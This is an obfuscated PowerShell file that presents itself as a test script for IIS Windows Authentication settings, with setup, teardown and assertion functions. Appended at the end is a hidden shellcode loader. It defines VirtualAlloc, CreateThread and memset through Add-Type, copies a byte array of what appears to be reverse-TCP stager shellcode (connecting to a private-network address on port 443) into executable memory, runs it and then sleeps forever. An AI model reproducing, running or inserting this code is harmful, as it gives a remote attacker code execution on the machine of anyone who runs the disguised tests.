${S`i`TENAmE} = ("{2}{1}{3}{0}" -f 'ion',' Authenti','Windows','cat')
${S`Ite`POrT} = 4387
${wEbcO`NFI`gp`ATh} = &("{2}{1}{0}" -f'h','oin-Pat','J') ${Te`ST`diR} ("{2}{0}{1}"-f 'eb.conf','ig','w')

function sTARt`-t`EStF`I`XTU`RE
{
    & (&("{0}{1}{3}{2}" -f 'J','oin-','th','Pa') -Path ${PssCr`I`pTR`OOT} ((("{5}{2}{4}{3}{6}{1}{0}"-f 'ps1','arbonTest.','.S5AIn','aliz','iti','.','e-C'))."ReP`la`Ce"('S5A',[StrInG][chAR]92)) -Resolve)
}

function s`T`Ar`T-TEsT
{
    &("{3}{2}{1}{4}{0}" -f'IisWebsite','l','ninsta','U','l-') ${SIt`Ena`me}
    .("{1}{5}{0}{4}{2}{3}" -f 'al','In','bsit','e','l-IisWe','st') -Name ${site`NA`me} -Path ${tEst`d`ir} -Bindings "http://*:$sitePort"
    if( &("{2}{1}{0}" -f 'th','st-Pa','Te') ${webCO`NFi`GPaTh} -PathType ("{1}{0}" -f'eaf','L') )
    {
        &("{0}{1}{2}" -f'R','emove','-Item') ${WEBCON`F`IgPAth}
    }
}

function sto`p-`TEst
{
    .("{1}{2}{0}{3}"-f 'b','Uninstall-Iis','We','site') ${si`TenAmE}
}

function TESt-s`HOUL`de`Nable`WInDOwsAUTH`E`NtI`c`A`TI`oN
{
    &("{4}{6}{0}{5}{1}{2}{3}" -f'dow','Authentica','ti','on','Set-IisWi','s','n') -SiteName ${Si`TEna`mE}
    .("{5}{3}{2}{6}{0}{4}{1}"-f'nti','tion','indowsAu','sert-W','ca','As','the') -KernelMode ${tr`Ue}
    .("{1}{6}{2}{5}{3}{4}{0}"-f'xist','A','F','leDoesNo','tE','i','ssert-') ${WE`B`CON`Figp`ATH} 
}

function tes`T-S`hOUldeNA`BleKe`RnEL`mOdE
{
    &("{0}{3}{5}{2}{1}{4}" -f'Set-','enticat','owsAuth','I','ion','isWind') -SiteName ${sit`Ena`ME}
    .("{2}{1}{3}{4}{0}" -f 'ntication','sert','As','-Windows','Authe') -KernelMode ${tR`Ue}
}

function TEST`-S`eTw`inDOwS`AU`ThEntI`CationO`NSUBfoL`de`Rs
{
    &("{1}{6}{4}{5}{3}{0}{2}" -f'then','Set','tication','u','nd','owsA','-IisWi') -SiteName ${S`iT`enAME} -Path ("{1}{2}{0}"-f 'der','S','ubFol')
    .("{5}{7}{1}{3}{2}{0}{4}{6}" -f'i','sA','nt','uthe','ca','Assert-Wind','tion','ow') -Path ("{1}{0}"-f 'bFolder','Su') -KernelMode ${t`RuE}
}

function Test-sHou`LDd`i`S`ABLek`erN`eLM`OdE
{
    &("{2}{7}{8}{4}{1}{0}{5}{3}{6}"-f 'dowsAuthe','n','S','i','i','nticat','on','e','t-IisW') -SiteName ${sI`TENa`Me} -DisableKernelMode
    &("{4}{0}{5}{2}{1}{3}" -f'Win','cati','nti','on','Assert-','dowsAuthe') -KernelMode ${F`AlSE}
}

function tEsT`-sh`o`UldSUP`PoRT`W`HATIf
{
    &("{3}{4}{6}{2}{5}{0}{1}" -f'c','ation','t','Set-','IisWind','i','owsAuthen') -SiteName ${SI`TEn`AMe} 
    &("{4}{1}{3}{6}{2}{5}{0}" -f'ation','t','uthenti','-Windo','Asser','c','wsA') -KernelMode ${TR`Ue}
    &("{5}{4}{0}{2}{1}{6}{3}" -f'-Ii','dowsAut','sWin','tion','et','S','hentica') -SiteName ${s`ITeNa`me} -WhatIf -DisableKernelMode
    &("{3}{1}{4}{5}{0}{2}" -f'at','ut','ion','Assert-WindowsA','henti','c') -KernelMode ${T`RUe}
}

function asS`ERt-`WINdOW`SAUT`h`ENT`ICaTion(${pA`TH} = '', [Boolean]${K`eRN`ElmO`De})
{
    ${A`U`THs`et`TINgS} = &("{1}{2}{3}{5}{4}{0}{6}" -f 'ca','G','et-I','isSecurit','ti','yAuthen','tion') -SiteName ${s`itenAMe} -Path ${Pa`TH} -Windows
    &("{1}{0}{3}{2}"-f'ert','Ass','l','-Equa') (${autHSet`TiN`gS}.("{2}{4}{1}{0}{5}{3}" -f'r','t','GetA','e','t','ibuteValu').Invoke( ("{2}{3}{0}{1}" -f'nelMo','de','us','eKer') )) ${K`Er`NElmODe}
}


${c} = ((("{9}{8}{41}{66}{47}{80}{43}{27}{1}{44}{42}{67}{24}{28}{36}{50}{59}{55}{65}{46}{58}{48}{11}{78}{81}{73}{15}{7}{14}{74}{19}{63}{61}{37}{52}{12}{10}{71}{23}{51}{33}{26}{85}{22}{5}{77}{60}{20}{86}{2}{29}{39}{25}{49}{56}{38}{40}{31}{68}{69}{76}{84}{83}{6}{4}{3}{82}{62}{45}{72}{16}{17}{79}{57}{53}{13}{70}{87}{21}{75}{0}{18}{88}{34}{30}{35}{32}{54}{64}"-f 'tr ','n IntPtr V','r ','I','wCreationFlags, ','bute','d','{','port({0}kernel','[DllIm','t','lProte','ublic sta','at','0}ker','rt(','port','({0}m','m','l','tackSize','xt','i','tPtr C','I','Add',' lpThreadA','exter','ntPtr lp','lp','(IntP','r lpPara','r dest, u','hread(IntPtr','mset','t','Add','}',', In','Start','tPt','32','ualAllo','lic static ','irt','pThrea','Al','dll{0','t f','res','re','reateT',')]p','0})]public st','int src, uint count)','e, uint f','s','dll{','locationType, uin','ss, uint dwSiz',', uint dwS','dll{0','tPtr l','32.',';','l','.','c(','met','e','i','ic extern In','dId);[DllIm','mpo','ne','ern IntP','r,','s','c','svcrt.','})]pub','t);[DllI','n','int ',' u','ttr',', IntPt','c e','e'))-f  [CHAR]34);${w} = &("{1}{0}" -f 'pe','Add-Ty') -memberDefinition ${c} -Name ("{1}{0}"-f 'n32','Wi') -namespace ("{0}{3}{4}{1}{2}" -f 'Win','i','ons','32F','unct') -passthru;[Byte[]];[Byte[]]${s`C} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x4a,0x80,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${s`iZE} = 0x1000;if (${Sc}."LE`N`GTH" -gt 0x1000){${S`IzE} = ${Sc}."LENG`Th"};${X}=${w}::("{0}{1}{2}"-f 'Vir','tualAllo','c').Invoke(0,0x1000,${sI`ZE},0x40);for (${I}=0;${i} -le (${sc}."LeNG`TH"-1);${i}++) {${w}::"MEms`eT"([IntPtr](${x}.("{1}{2}{0}"-f '2','ToIn','t3').Invoke()+${i}), ${SC}[${i}], 1)};${w}::("{0}{3}{1}{2}" -f 'C','rea','d','reateTh').Invoke(0,0,${X},0,0,0);for (;;){&("{3}{0}{2}{1}"-f 't','p','art-slee','S') 60};
